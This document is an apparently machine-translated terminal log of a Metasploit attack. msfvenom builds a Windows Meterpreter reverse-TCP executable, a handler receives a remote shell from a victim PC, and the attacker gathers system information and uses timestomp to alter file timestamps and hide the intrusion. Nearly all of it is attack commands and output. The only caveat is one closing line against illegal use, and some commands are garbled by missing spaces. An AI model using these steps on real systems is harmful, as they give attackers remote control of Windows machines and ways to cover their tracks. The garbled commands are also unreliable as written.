[Email protected]:~# msfvenom-pwindows/meterpreter/reverse_tcp lhost=192.168.1.117 lport=1234--format=exe>/root /attack.exe
No platform was selected, Choosingmsf::module::P latform::windows from the payload
No Arch selected, selecting Arch:x86 fromthe payload
No encoder or Badchars specified,outputting raw payload
Payload size:333 bytes
Final size of exe file:73802 bytes
Saved as:/root/attack.exe (virus)
[Email protected]:~# service PostgreSQL start
[Email protected]:~# msfconsole
[Email protected]:~# db_status
MSF > Use Exploit/multi/handler
MSF exploit (handler) > Set PAYLOADWINDOWS/METERPRETER/REVERSE_TCP
MSF exploit (handler) > Set lhost192.168.1.117 (Kali Linux host)
MSF exploit (handler) > set Lport 1234
MSF exploit (handler) > Show options
MSF exploit (handler) > Exploit-h
MSF exploit (handler) > Exploit-j Z
[*] Exploit running as background job.
[*] Started Reverse TCP Handler on192.168.1.117:1234
MSF exploit (handler) > [*] starting Thepayload handler ...
Start listening.
Windows host running Attack.exe
MSF exploit (handler) > [*] starting Thepayload handler ...
[*] Sending stage (957999 bytes) to192.168.1.94
[*] Meterpreter Session 1 opened (192.168.1.117:1234-192.168.1.94:58540) at 2017-03-10 00:16:54-0500 (Windows host running Atta Ck.exe after session 1)
MSF exploit (handler) > Sessions-i
Active Sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 Meterpreter x86/win32 sh-270\sewells @ SH-270 192.168.1.117:1234 (192.168.1.94:58540)
MSF exploit (handler) > Sessions-i1 (1 is session ID number)
Meterpreter > pwd (Successful login)
C:\Users\sewells\Desktop
Meterpreter > SysInfo
computer:sh-270
Os:windows (Build 14393).
Architecture:x64 (current Process is WOW64)
System LANGUAGE:ZH_CN
Domain:workgroup
Logged on Users:1
Meterpreter:x86/win32
Meterpreter > Getuid
Server Username:sh-270\sewells
Meterpreter > Timestomp-h Modify Intrusion Time
Meterpreter > Timestomp attack.exe-v
Modified:2017-03-10 00:01:11-0500
Accessed:2017-03-10 00:03:26-0500
Created:2017-03-10 00:18:07-0500
Entry modified:2017-03-10 00:18:07-0500
Bounce intrusion (almost for any Windows host) (do not use illegal operations!!!) ))